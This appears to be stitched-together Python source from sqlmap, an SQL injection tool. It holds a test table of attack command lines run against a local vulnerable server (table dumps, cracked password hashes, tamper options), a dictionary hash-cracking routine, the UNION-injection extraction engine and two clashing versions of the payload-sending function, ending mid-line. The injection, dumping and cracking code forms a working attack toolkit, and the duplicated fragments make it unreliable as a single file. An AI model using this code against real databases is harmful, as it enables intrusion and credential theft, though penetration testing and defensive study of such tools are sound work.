UNION query", "banner: '3.", "Nexus", "Sna: Fu", "Foo: Bar")), ("-u <base> --flush-session --method=PUT --data=\"a=1;id=1;b=2\" --param-del=\";\" --skip-static --har=<tmpfile> --dump -T users --start=1 --stop=2", ("might be injectable", "Parameter: id (PUT)", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", "2 entries")), ("-u <url> --flush-session -H \"id: 1*\" --tables -t <tmpfile>", ("might be injectable", "Parameter: id #1* ((custom) HEADER)", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", " users ")), ("-u <url> --flush-session --banner --invalid-logical --technique=B --predict-output --test-filter=\"OR boolean\" --tamper=space2dash", ("banner: '3.", " LIKE ")), ("-u <url> --flush-session --cookie=\"PHPSESSID=d41d8cd98f00b204e9800998ecf8427e; id=1*; id2=2\" --tables --union-cols=3", ("might be injectable", "Cookie #1* ((custom) HEADER)", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", " users ")), ("-u <url> --flush-session --null-connection --technique=B --tamper=between,randomcase --banner --count -T users", ("NULL connection is supported with HEAD method", "banner: '3.", "users | 5")), ("-u <base> --data=\"aWQ9MQ==\" --flush-session --base64=POST -v 6", ("aWQ9MTtXQUlURk9SIERFTEFZICcwOjA",)), ("-u <url> --flush-session --parse-errors --test-filter=\"subquery\" --eval=\"import hashlib; id2=2; id3=hashlib.md5(id.encode()).hexdigest()\" --referer=\"localhost\"", ("might be injectable", ": syntax error", "back-end DBMS: SQLite", "WHERE or HAVING clause (subquery")), ("-u <url> --banner --schema --dump -T users --binary-fields=surname --where \"id>3\"", ("banner: '3.", "INTEGER", "TEXT", "id", "name", "surname", "2 entries", "6E616D6569736E756C6C")), ("-u <url> --technique=U --fresh-queries --force-partial --dump -T users --dump-format=HTML --answers=\"crack=n\" -v 3", ("performed 6 queries", "nameisnull", "~using default dictionary", "dumped to HTML file")), ("-u <url> --flush-session --all", ("5 entries", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", "luther", "blisset", "fluffy", "179ad45c6ce2cb97cf1029e212046e81", "NULL", "nameisnull", "testpass")), ("-u <url> -z \"tec=B\" --hex --fresh-queries --threads=4 --sql-query=\"SELECT * FROM users\"", ("SELECT * FROM users [5]", "nameisnull")), ("-u \"<url>&echo=foobar*\" --flush-session", ("might be vulnerable to cross-site scripting",)), ("-u \"<url>&query=*\" --flush-session --technique=Q --banner", ("Title: SQLite inline queries", "banner: '3.")), ("-d \"<direct>\" --flush-session --dump -T users --dump-format=SQLITE --binary-fields=name --where \"id=3\"", ("7775", "179ad45c6ce2cb97cf1029e212046e81 (testpass)", "dumped to SQLITE database")), ("-d \"<direct>\" --flush-session --banner --schema --sql-query=\"UPDATE users SET name='foobar' WHERE id=5; SELECT * FROM users; SELECT 987654321\"", ("banner: '3.", "INTEGER", "TEXT", "id", "name", "surname", "5, foobar, nameisnull", "'987654321'",)), ("--purge -v 3", ("~ERROR", "~CRITICAL", "deleting the whole directory tree")), ) retVal = True count = 0 while True: address, port = "127.0.0.1", random.randint(10000, 65535) try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) if s.connect_ex((address, port)): break else: time.sleep(1) finally: s.close() def _thread(): vulnserver.init(quiet=True) vulnserver.run(address=address, port=port) vulnserver._alive = True thread = threading.Thread(target=_thread) thread.daemon = True thread.start() while vulnserver._alive: s = 
socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((address, port)) s.sendall(b"GET / HTTP/1.1\r\n\r\n") result = b"" while True: current = s.recv(1024) if not current: break else: result += current if b"vulnserver" in result: break except: pass finally: s.close() time.sleep(1) if not vulnserver._alive: logger.error("problem occurred in vulnserver instantiation (address: 'http://%s:%s')" % (address, port)) return False else: logger.info("vulnserver running at 'http://%s:%s'..." % (address, port)) handle, config = tempfile.mkstemp(suffix=".conf") os.close(handle) handle, database = tempfile.mkstemp(suffix=".sqlite") os.close(handle) with sqlite3.connect(database) as conn: c = conn.cursor() c.executescript(vulnserver.SCHEMA) handle, request = tempfile.mkstemp(suffix=".req") os.close(handle) handle, log = tempfile.mkstemp(suffix=".log") os.close(handle) handle, multiple = tempfile.mkstemp(suffix=".lst") os.close(handle) content = "POST / HTTP/1.0\nUser-agent: foobar\nHost: %s:%s\n\nid=1\n" % (address, port) with open(request, "w+") as f: f.write(content) f.flush() content = '<port>%d</port><request base64="true"><![CDATA[%s]]></request>' % (port, encodeBase64(content, binary=False)) with open(log, "w+") as f: f.write(content) f.flush() base = "http://%s:%d/" % (address, port) url = "%s?id=1" % base direct = "sqlite3://%s" % database tmpdir = tempfile.mkdtemp() content = open(os.path.abspath(os.path.join(os.path.dirname(__file__), "..", "..", "sqlmap.conf"))).read().replace("url =", "url = %s" % url) with open(config, "w+") as f: f.write(content) f.flush() content = "%s?%s=%d\n%s?%s=%d\n%s&%s=1" % (base, randomStr(), randomInt(), base, randomStr(), randomInt(), url, randomStr()) with open(multiple, "w+") as f: f.write(content) f.flush() for options, checks in TESTS: status = '%d/%d (%d%%) ' % (count, len(TESTS), round(100.0 * count / len(TESTS))) dataToStdout("\r[%s] [INFO] complete: %s" % (time.strftime("%X"), status)) if IS_WIN and "uraj" in options: options = options.replace(u"\u0161u\u0107uraj", "sucuraj") checks = [check.replace(u"\u0161u\u0107uraj", "sucuraj") for check in checks] for tag, value in (("<url>", url), ("<base>", base), ("<direct>", direct), ("<tmpdir>", tmpdir), ("<request>", request), ("<log>", log), ("<multiple>", multiple), ("<config>", config), ("<base64>", url.replace("id=1", "id=MZ=%3d"))): options = options.replace(tag, value) cmd = "%s \"%s\" %s --batch --non-interactive --debug --time-sec=1" % (sys.executable if ' ' not in sys.executable else '"%s"' % sys.executable, os.path.abspath(os.path.join(os.path.dirname(__file__), "..", "..", "sqlmap.py")), options) if "<tmpfile>" in cmd: handle, tmp = tempfile.mkstemp() os.close(handle) cmd = cmd.replace("<tmpfile>", tmp) output = shellExec(cmd) if not all((check in output if not check.startswith('~') else check[1:] not in output) for check in checks) or "unhandled exception" in output: dataToStdout("---\n\n$ %s\n" % cmd) dataToStdout("%s---\n" % output, coloring=False) retVal = False count += 1 clearConsoleLine() if retVal: logger.info("vuln test final result: PASSED") else: logger.error("vuln test final result: FAILED") return retVal
def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc_count, wordlists, custom_wordlist): count = 0 rotator = 0 hashes = set([item[0][1] for item in attack_info]) wordlist = Wordlist(wordlists, proc_id, getattr(proc_count, "value", 0), custom_wordlist) try: for word in wordlist: if not attack_info: break if not isinstance(word, basestring): continue if suffix: word = word + suffix try: current = __functions__[hash_regex](password = word, uppercase = False) count += 1 if current in hashes: for item in attack_info[:]: ((user, hash_), _) = item if hash_ == current: retVal.put((user, hash_, word)) clearConsoleLine() infoMsg = "\r[%s] [INFO] cracked password '%s'" % (time.strftime("%X"), word) if user and not user.startswith(DUMMY_USER_PREFIX): infoMsg += " for user '%s'\n" % user else: infoMsg += " for hash '%s'\n" % hash_ dataToStdout(infoMsg, True) attack_info.remove(item) elif (proc_id == 0 or getattr(proc_count, "value", 0) == 1) and count % HASH_MOD_ITEM_DISPLAY == 0 or hash_regex == HASH.ORACLE_OLD or hash_regex == HASH.CRYPT_GENERIC and IS_WIN: rotator += 1 if rotator >= len(ROTATING_CHARS): rotator = 0 status = 'current status: %s... %s' % (word.ljust(5)[:5], ROTATING_CHARS[rotator]) dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status)) except KeyboardInterrupt: raise except (UnicodeEncodeError, UnicodeDecodeError): pass # ignore possible encoding problems caused by some words in custom dictionaries except Exception, e: warnMsg = "there was a problem while hashing entry: %s. " % repr(word) warnMsg += "Please report by e-mail to %s" % ML logger.critical(warnMsg) except KeyboardInterrupt: pass finally: if hasattr(proc_count, 'value'): proc_count.value -= 1
def unionUse(expression, unpack=True, dump=False): """ This function tests for an UNION SQL injection on the target URL then call its subsidiary function to effectively perform an UNION SQL injection on the affected URL """ initTechnique(PAYLOAD.TECHNIQUE.UNION) abortedFlag = False count = None origExpr = expression startLimit = 0 stopLimit = None value = None width = getConsoleWidth() start = time.time() _, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(origExpr) # Set kb.partRun in case the engine is called from the API kb.partRun = getPartRun(alias=False) if conf.api else None if Backend.isDbms(DBMS.MSSQL) and kb.dumpColumns: kb.rowXmlMode = True _ = "(%s FOR XML RAW, BINARY BASE64)" % expression output = _oneShotUnionUse(_, False) value = parseUnionPage(output) kb.rowXmlMode = False if expressionFieldsList and len(expressionFieldsList) > 1 and "ORDER BY" in expression.upper(): # Removed ORDER BY clause because UNION does not play well with it expression = re.sub(r"(?i)\s*ORDER BY\s+[\w,]+", "", expression) debugMsg = "stripping ORDER BY clause from statement because " debugMsg += "it does not play well with UNION query SQL injection" singleTimeDebugMessage(debugMsg) # We have to check if the SQL query might return multiple entries # if the technique is partial UNION query and in such case forge the # SQL limiting the query output one entry at a time # NOTE: we assume that only queries that get data from a table can # return multiple entries if value is None and (kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.NEGATIVE or kb.forcePartialUnion or (dump and (conf.limitStart or conf.limitStop)) or "LIMIT " in expression.upper()) and " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) and not re.search(SQL_SCALAR_REGEX, expression, re.I): expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression, dump) if limitCond: # Count the number of SQL query entries output countedExpression = expression.replace(expressionFields, queries[Backend.getIdentifiedDbms()].count.query % ('*' if len(expressionFieldsList) > 1 else expressionFields), 1) if " ORDER BY " in countedExpression.upper(): _ = countedExpression.upper().rindex(" ORDER BY ") countedExpression = countedExpression[:_] output = _oneShotUnionUse(countedExpression, unpack) count = unArrayizeValue(parseUnionPage(output)) if isNumPosStrValue(count): if isinstance(stopLimit, int) and stopLimit > 0: stopLimit = min(int(count), int(stopLimit)) else: stopLimit = int(count) infoMsg = "used SQL query returns " infoMsg += "%d %s" % (stopLimit, "entries" if stopLimit > 1 else "entry") logger.info(infoMsg) elif count and (not isinstance(count, six.string_types) or not count.isdigit()): warnMsg = "it was not possible to count the number " warnMsg += "of entries for the SQL query provided. " warnMsg += "sqlmap will assume that it returns only " warnMsg += "one entry" logger.warn(warnMsg) stopLimit = 1 elif (not count or int(count) == 0): if not count: warnMsg = "the SQL query provided does not " warnMsg += "return any output" logger.warn(warnMsg) else: value = [] # for empty tables return value if isNumPosStrValue(count) and int(count) > 1: threadData = getCurrentThreadData() try: threadData.shared.limits = iter(xrange(startLimit, stopLimit)) except OverflowError: errMsg = "boundary limits (%d,%d) are too large. 
Please rerun " % (startLimit, stopLimit) errMsg += "with switch '--fresh-queries'" raise SqlmapDataException(errMsg) numThreads = min(conf.threads, (stopLimit - startLimit)) threadData.shared.value = BigArray() threadData.shared.buffered = [] threadData.shared.counter = 0 threadData.shared.lastFlushed = startLimit - 1 threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1 if threadData.shared.showEta: threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit)) if stopLimit > TURN_OFF_RESUME_INFO_LIMIT: kb.suppressResumeInfo = True debugMsg = "suppressing possible resume console info because of " debugMsg += "large number of rows. It might take too long" logger.debug(debugMsg) try: def unionThread(): threadData = getCurrentThreadData() while kb.threadContinue: with kb.locks.limit: try: threadData.shared.counter += 1 num = next(threadData.shared.limits) except StopIteration: break if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE): field = expressionFieldsList[0] elif Backend.isDbms(DBMS.ORACLE): field = expressionFieldsList else: field = None limitedExpr = agent.limitQuery(num, expression, field) output = _oneShotUnionUse(limitedExpr, unpack, True) if not kb.threadContinue: break if output: with kb.locks.value: if all(_ in output for _ in (kb.chars.start, kb.chars.stop)): items = parseUnionPage(output) if threadData.shared.showEta: threadData.shared.progress.progress(threadData.shared.counter) if isListLike(items): # in case that we requested N columns and we get M!=N then we have to filter a bit if len(items) > 1 and len(expressionFieldsList) > 1: items = [item for item in items if isListLike(item) and len(item) == len(expressionFieldsList)] items = [_ for _ in flattenValue(items)] if len(items) > len(expressionFieldsList): filtered = OrderedDict() for item in items: key = re.sub(r"[^A-Za-z0-9]", "", item).lower() if key not in filtered or re.search(r"[^A-Za-z0-9]", item): filtered[key] = item items = filtered.values() items = [items] index = None for index in xrange(1 + len(threadData.shared.buffered)): if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num: break threadData.shared.buffered.insert(index or 0, (num, items)) else: index = None if threadData.shared.showEta: threadData.shared.progress.progress(threadData.shared.counter) for index in xrange(1 + len(threadData.shared.buffered)): if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num: break threadData.shared.buffered.insert(index or 0, (num, None)) items = output.replace(kb.chars.start, "").replace(kb.chars.stop, "").split(kb.chars.delimiter) while threadData.shared.buffered and (threadData.shared.lastFlushed + 1 >= threadData.shared.buffered[0][0] or len(threadData.shared.buffered) > MAX_BUFFERED_PARTIAL_UNION_LENGTH): threadData.shared.lastFlushed, _ = threadData.shared.buffered[0] if not isNoneValue(_): threadData.shared.value.extend(arrayizeValue(_)) del threadData.shared.buffered[0] if conf.verbose == 1 and not (threadData.resumed and kb.suppressResumeInfo) and not threadData.shared.showEta: _ = ','.join("'%s'" % _ for _ in (flattenValue(arrayizeValue(items)) if not isinstance(items, six.string_types) else [items])) status = "[%s] [INFO] %s: %s" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", _ if kb.safeCharEncode else safecharencode(_)) if len(status) > width: status = "%s..." 
% status[:width - 3] dataToStdout("%s\n" % status) runThreads(numThreads, unionThread) if conf.verbose == 1: clearConsoleLine(True) except KeyboardInterrupt: abortedFlag = True warnMsg = "user aborted during enumeration. sqlmap " warnMsg += "will display partial output" logger.warn(warnMsg) finally: for _ in sorted(threadData.shared.buffered): if not isNoneValue(_[1]): threadData.shared.value.extend(arrayizeValue(_[1])) value = threadData.shared.value kb.suppressResumeInfo = False if not value and not abortedFlag: output = _oneShotUnionUse(expression, unpack) value = parseUnionPage(output) duration = calculateDeltaSeconds(start) if not kb.bruteMode: debugMsg = "performed %d queries in %.2f seconds" % (kb.counters[PAYLOAD.TECHNIQUE.UNION], duration) logger.debug(debugMsg) return value
def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True): """ This method calls a function to get the target URL page content and returns its page MD5 hash or a boolean value in case of string match check ('--string' command line parameter) """ if conf.direct: return direct(value, content) get = None post = None cookie = None ua = None referer = None host = None page = None pageLength = None uri = None code = None if not place: place = kb.injection.place or PLACE.GET raise404 = place != PLACE.URI if raise404 is None else raise404 value = agent.adjustLateValues(value) payload = agent.extractPayload(value) threadData = getCurrentThreadData() if conf.httpHeaders: headers = dict(conf.httpHeaders) contentType = max(headers[_] if _.upper() == HTTP_HEADER.CONTENT_TYPE.upper() else None for _ in headers.keys()) if (kb.postHint or conf.skipUrlEncode) and kb.postUrlEncode: kb.postUrlEncode = False conf.httpHeaders = [ _ for _ in conf.httpHeaders if _[1] != contentType ] contentType = POST_HINT_CONTENT_TYPES.get( kb.postHint, PLAIN_TEXT_CONTENT_TYPE) conf.httpHeaders.append( (HTTP_HEADER.CONTENT_TYPE, contentType)) if payload: if kb.tamperFunctions: for function in kb.tamperFunctions: payload = function(payload=payload, headers=auxHeaders) if not isinstance(payload, basestring): errMsg = "tamper function '%s' returns " % function.func_name errMsg += "invalid payload type ('%s')" % type(payload) raise SqlmapValueException(errMsg) value = agent.replacePayload(value, payload) logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload)) if place == PLACE.CUSTOM_POST and kb.postHint: if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML): # payloads in SOAP/XML should have chars > and < replaced # with their HTML encoded counterparts payload = payload.replace('>', ">").replace('<', "<") elif kb.postHint == POST_HINT.JSON: if payload.startswith('"') and payload.endswith('"'): payload = json.dumps(payload[1:-1]) else: payload = json.dumps(payload)[1:-1] elif kb.postHint == POST_HINT.JSON_LIKE: payload = payload.replace("'", REPLACEMENT_MARKER).replace( '"', "'").replace(REPLACEMENT_MARKER, '"') if payload.startswith('"') and payload.endswith('"'): payload = json.dumps(payload[1:-1]) else: payload = json.dumps(payload)[1:-1] payload = payload.replace("'", REPLACEMENT_MARKER).replace( '"', "'").replace(REPLACEMENT_MARKER, '"') value = agent.replacePayload(value, payload) else: # GET, POST, URI and Cookie payload needs to be throughly URL encoded if place in (PLACE.GET, PLACE.URI, PLACE.COOKIE ) and not conf.skipUrlEncode or place in ( PLACE.POST, PLACE.CUSTOM_POST) and kb.postUrlEncode: payload = urlencode( payload, '%', False, place != PLACE.URI) # spaceplus is handled down below value = agent.replacePayload(value, payload) if conf.hpp: if not any(conf.url.lower().endswith(_.lower()) for _ in (WEB_API.ASP, WEB_API.ASPX)): warnMsg = "HTTP parameter pollution should work only against " warnMsg += "ASP(.NET) targets" singleTimeWarnMessage(warnMsg) if place in (PLACE.GET, PLACE.POST): _ = re.escape(PAYLOAD_DELIMITER) match = re.search( "(?P<name>\w+)=%s(?P<value>.+?)%s" % (_, _), value) if match: payload = match.group("value") for splitter in (urlencode(' '), ' '): if splitter in payload: prefix, suffix = ( "*/", "/*") if splitter == ' ' else ( urlencode(_) for _ in ("*/", "/*")) parts = payload.split(splitter) parts[0] = "%s%s" % (parts[0], suffix) parts[-1] 
= "%s%s=%s%s" % ( DEFAULT_GET_POST_DELIMITER, match.group("name"), prefix, parts[-1]) for i in xrange(1, len(parts) - 1): parts[i] = "%s%s=%s%s%s" % ( DEFAULT_GET_POST_DELIMITER, match.group("name"), prefix, parts[i], suffix) payload = "".join(parts) for splitter in (urlencode(','), ','): payload = payload.replace( splitter, "%s%s=" % (DEFAULT_GET_POST_DELIMITER, match.group("name"))) value = agent.replacePayload(value, payload) else: warnMsg = "HTTP parameter pollution works only with regular " warnMsg += "GET and POST parameters" singleTimeWarnMessage(warnMsg) if place: value = agent.removePayloadDelimiters(value) if PLACE.GET in conf.parameters: get = conf.parameters[ PLACE.GET] if place != PLACE.GET or not value else value if PLACE.POST in conf.parameters: post = conf.parameters[ PLACE.POST] if place != PLACE.POST or not value else value if PLACE.CUSTOM_POST in conf.parameters: post = conf.parameters[PLACE.CUSTOM_POST].replace( CUSTOM_INJECTION_MARK_CHAR, "") if place != PLACE.CUSTOM_POST or not value else value post = post.replace(ASTERISK_MARKER, '*') if post else post if PLACE.COOKIE in conf.parameters: cookie = conf.parameters[ PLACE.COOKIE] if place != PLACE.COOKIE or not value else value if PLACE.USER_AGENT in conf.parameters: ua = conf.parameters[ PLACE. USER_AGENT] if place != PLACE.USER_AGENT or not value else value if PLACE.REFERER in conf.parameters: referer = conf.parameters[ PLACE. REFERER] if place != PLACE.REFERER or not value else value if PLACE.HOST in conf.parameters: host = conf.parameters[ PLACE.HOST] if place != PLACE.HOST or not value else value if PLACE.URI in conf.parameters: uri = conf.url if place != PLACE.URI or not value else value else: uri = conf.url if value and place == PLACE.CUSTOM_HEADER: if not auxHeaders: auxHeaders = {} auxHeaders[value.split(',')[0]] = value.split(',', 1)[1] if conf.rParam: def _randomizeParameter(paramString, randomParameter): retVal = paramString match = re.search("%s=(?P<value>[^&;]+)" % randomParameter, paramString) if match: origValue = match.group("value") retVal = re.sub( "%s=[^&;]+" % randomParameter, "%s=%s" % (randomParameter, randomizeParameterValue(origValue)), paramString) return retVal for randomParameter in conf.rParam: for item in (PLACE.GET, PLACE.POST, PLACE.COOKIE): if item in conf.parameters: if item == PLACE.GET and get: get = _randomizeParameter(get, randomParameter) elif item == PLACE.POST and post: post = _randomizeParameter(post, randomParameter) elif item == PLACE.COOKIE and cookie: cookie = _randomizeParameter( cookie, randomParameter) if conf.evalCode: delimiter = conf.paramDel or DEFAULT_GET_POST_DELIMITER variables = {} originals = {} for item in filter(None, (get, post if not kb.postHint else None)): for part in item.split(delimiter): if '=' in part: name, value = part.split('=', 1) value = urldecode(value, convall=True, plusspace=(item == post and kb.postSpaceToPlus)) evaluateCode("%s=%s" % (name.strip(), repr(value)), variables) if cookie: for part in cookie.split(conf.cookieDel or DEFAULT_COOKIE_DELIMITER): if '=' in part: name, value = part.split('=', 1) value = urldecode(value, convall=True) evaluateCode("%s=%s" % (name.strip(), repr(value)), variables) originals.update(variables) evaluateCode(conf.evalCode, variables) for name, value in variables.items(): if name != "__builtins__" and originals.get(name, "") != value: if isinstance(value, (basestring, int)): found = False value = unicode(value) regex = r"((\A|%s)%s=).+?(%s|\Z)" % ( re.escape(delimiter), name, re.escape(delimiter)) if 
re.search(regex, (get or "")): found = True get = re.sub(regex, "\g<1>%s\g<3>" % value, get) if re.search(regex, (post or "")): found = True post = re.sub(regex, "\g<1>%s\g<3>" % value, post) regex = r"((\A|%s)%s=).+?(%s|\Z)" % ( re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER), name, re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER)) if re.search(regex, (cookie or "")): found = True cookie = re.sub(regex, "\g<1>%s\g<3>" % value, cookie) if not found: if post is not None: post += "%s%s=%s" % (delimiter, name, value) elif get is not None: get += "%s%s=%s" % (delimiter, name, value) elif cookie is not None: cookie += "%s%s=%s" % ( conf.cookieDel or DEFAULT_COOKIE_DELIMITER, name, value) if not conf.skipUrlEncode: get = urlencode(get, limit=True) if post is not None: if place not in (PLACE.POST, PLACE.CUSTOM_POST) and hasattr( post, UNENCODED_ORIGINAL_VALUE): post = getattr(post, UNENCODED_ORIGINAL_VALUE) elif kb.postUrlEncode: post = urlencode(post, spaceplus=kb.postSpaceToPlus) if timeBasedCompare: if len(kb.responseTimes) < MIN_TIME_RESPONSES: clearConsoleLine() if conf.tor: warnMsg = "it's highly recommended to avoid usage of switch '--tor' for " warnMsg += "time-based injections because of its high latency time" singleTimeWarnMessage(warnMsg) warnMsg = "[%s] [WARNING] time-based comparison requires " % time.strftime( "%X") warnMsg += "larger statistical model, please wait" dataToStdout(warnMsg) while len(kb.responseTimes) < MIN_TIME_RESPONSES: Connect.queryPage(content=True) dataToStdout('.') dataToStdout("\n") elif not kb.testMode: warnMsg = "it is very important not to stress the network adapter " warnMsg += "during usage of time-based payloads to prevent potential " warnMsg += "errors " singleTimeWarnMessage(warnMsg) if not kb.laggingChecked: kb.laggingChecked = True deviation = stdev(kb.responseTimes) if deviation > WARN_TIME_STDEV: kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE warnMsg = "there is considerable lagging " warnMsg += "in connection response(s). Please use as high " warnMsg += "value for option '--time-sec' as possible (e.g. 
" warnMsg += "10 or more)" logger.critical(warnMsg) if conf.safUrl and conf.saFreq > 0: kb.queryCounter += 1 if kb.queryCounter % conf.saFreq == 0: Connect.getPage(url=conf.safUrl, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer, host=host) start = time.time() if kb.nullConnection and not content and not response and not timeBasedCompare: noteResponseTime = False pushValue(kb.pageCompress) kb.pageCompress = False if kb.nullConnection == NULLCONNECTION.HEAD: method = HTTPMETHOD.HEAD elif kb.nullConnection == NULLCONNECTION.RANGE: if not auxHeaders: auxHeaders = {} auxHeaders[HTTP_HEADER.RANGE] = "bytes=-1" _, headers, code = Connect.getPage( url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, raise404=raise404, skipRead=(kb.nullConnection == NULLCONNECTION.SKIP_READ)) if headers: if kb.nullConnection in ( NULLCONNECTION.HEAD, NULLCONNECTION.SKIP_READ ) and HTTP_HEADER.CONTENT_LENGTH in headers: pageLength = int(headers[HTTP_HEADER.CONTENT_LENGTH]) elif kb.nullConnection == NULLCONNECTION.RANGE and HTTP_HEADER.CONTENT_RANGE in headers: pageLength = int( headers[HTTP_HEADER.CONTENT_RANGE] [headers[HTTP_HEADER.CONTENT_RANGE].find('/') + 1:]) kb.pageCompress = popValue() if not pageLength: try: page, headers, code = Connect.getPage( url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare) except MemoryError: page, headers, code = None, None, None warnMsg = "site returned insanely large response" if kb.testMode: warnMsg += " in testing phase. This is a common " warnMsg += "behavior in custom WAF/IDS/IPS solutions" singleTimeWarnMessage(warnMsg) if conf.secondOrder: page, headers, code = Connect.getPage( url=conf.secondOrder, cookie=cookie, ua=ua, silent=silent, auxHeaders=auxHeaders, response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True) threadData.lastQueryDuration = calculateDeltaSeconds(start) kb.originalCode = kb.originalCode or code if kb.testMode: kb.testQueryCount += 1 if timeBasedCompare: return wasLastResponseDelayed() elif noteResponseTime: kb.responseTimes.append(threadData.lastQueryDuration) if not response and removeReflection: page = removeReflectiveValues(page, payload) kb.maxConnectionsFlag = re.search(MAX_CONNECTIONS_REGEX, page or "", re.I) is not None kb.permissionFlag = re.search(PERMISSION_DENIED_REGEX, page or "", re.I) is not None if content or response: return page, headers if getRatioValue: return comparison(page, headers, code, getRatioValue=False, pageLength=pageLength), comparison( page, headers, code, getRatioValue=True, pageLength=pageLength) else: return comparison(page, headers, code, getRatioValue, pageLength)
def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True): """ This method calls a function to get the target URL page content and returns its page MD5 hash or a boolean value in case of string match check ('--string' command line parameter) """ if conf.direct: return direct(value, content) get = None post = None cookie = None ua = None referer = None host = None page = None pageLength = None uri = None code = None if not place: place = kb.injection.place or PLACE.GET raise404 = place != PLACE.URI if raise404 is None else raise404 value = agent.adjustLateValues(value) payload = agent.extractPayload(value) threadData = getCurrentThreadData() if payload: if kb.tamperFunctions: for function in kb.tamperFunctions: payload = function(payload) value = agent.replacePayload(value, payload) logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload)) if place in (PLACE.GET, PLACE.POST, PLACE.URI, PLACE.CUSTOM_POST): # payloads in GET and/or POST need to be urlencoded # thoroughly without safe chars (especially & and =) # addendum: as we support url encoding in tampering # functions therefore we need to use % as a safe char if place != PLACE.URI or (value and payload and '?' in value and value.find('?') < value.find(payload)): payload = urlencode(payload, '%', False, True) if not place in (PLACE.POST, PLACE.CUSTOM_POST) and conf.skipUrlEncode else payload value = agent.replacePayload(value, payload) elif place == PLACE.SOAP: # payloads in SOAP should have chars > and < replaced # with their HTML encoded counterparts payload = payload.replace('>', "&gt;").replace('<', "&lt;") value = agent.replacePayload(value, payload) if place: value = agent.removePayloadDelimiters(value) if place == PLACE.COOKIE and conf.cookieUrlencode: value = urlEncodeCookieValues(value) if conf.checkPayload: checkPayload(value) if PLACE.GET in conf.parameters: get = conf.parameters[PLACE.GET] if place != PLACE.GET or not value else value if PLACE.POST in conf.parameters: post = conf.parameters[PLACE.POST] if place != PLACE.POST or not value else value if PLACE.CUSTOM_POST in conf.parameters: post = conf.parameters[PLACE.CUSTOM_POST].replace(CUSTOM_INJECTION_MARK_CHAR, "") if place != PLACE.CUSTOM_POST or not value else value if PLACE.SOAP in conf.parameters: post = conf.parameters[PLACE.SOAP] if place != PLACE.SOAP or not value else value if PLACE.COOKIE in conf.parameters: cookie = conf.parameters[PLACE.COOKIE] if place != PLACE.COOKIE or not value else value if PLACE.UA in conf.parameters: ua = conf.parameters[PLACE.UA] if place != PLACE.UA or not value else value if PLACE.REFERER in conf.parameters: referer = conf.parameters[PLACE.REFERER] if place != PLACE.REFERER or not value else value if PLACE.HOST in conf.parameters: host = conf.parameters[PLACE.HOST] if place != PLACE.HOST or not value else value if PLACE.URI in conf.parameters: uri = conf.url if place != PLACE.URI or not value else value else: uri = conf.url if conf.rParam: def _randomizeParameter(paramString, randomParameter): retVal = paramString match = re.search("%s=(?P<value>[^&;]+)" % randomParameter, paramString) if match: origValue = match.group("value") retVal = re.sub("%s=[^&;]+" % randomParameter, "%s=%s" % (randomParameter, randomizeParameterValue(origValue)), paramString) return retVal for randomParameter in conf.rParam: for item in [PLACE.GET, PLACE.POST, PLACE.COOKIE]: if item in conf.parameters: if
item == PLACE.GET and get: get = _randomizeParameter(get, randomParameter) elif item == PLACE.POST and post: post = _randomizeParameter(post, randomParameter) elif item == PLACE.COOKIE and cookie: cookie = _randomizeParameter(cookie, randomParameter) if conf.evalCode: delimiter = conf.pDel or "&" variables = {} originals = {} for item in filter(None, (get, post)): for part in item.split(delimiter): if '=' in part: name, value = part.split('=', 1) evaluateCode("%s='%s'" % (name, value), variables) originals.update(variables) evaluateCode(conf.evalCode, variables) for name, value in variables.items(): if name != "__builtins__" and originals.get(name, "") != value: if isinstance(value, (basestring, int)): value = unicode(value) if '%s=' % name in (get or ""): get = re.sub("((\A|\W)%s=)([^%s]+)" % (name, delimiter), "\g<1>%s" % value, get) elif '%s=' % name in (post or ""): post = re.sub("((\A|\W)%s=)([^%s]+)" % (name, delimiter), "\g<1>%s" % value, post) elif post: post += "%s%s=%s" % (delimiter, name, value) else: get += "%s%s=%s" % (delimiter, name, value) get = urlencode(get, limit=True) if post and place not in (PLACE.POST, PLACE.SOAP, PLACE.CUSTOM_POST) and hasattr(post, UNENCODED_ORIGINAL_VALUE): post = getattr(post, UNENCODED_ORIGINAL_VALUE) elif not conf.skipUrlEncode and place not in (PLACE.SOAP,): post = urlencode(post) if timeBasedCompare: if len(kb.responseTimes) < 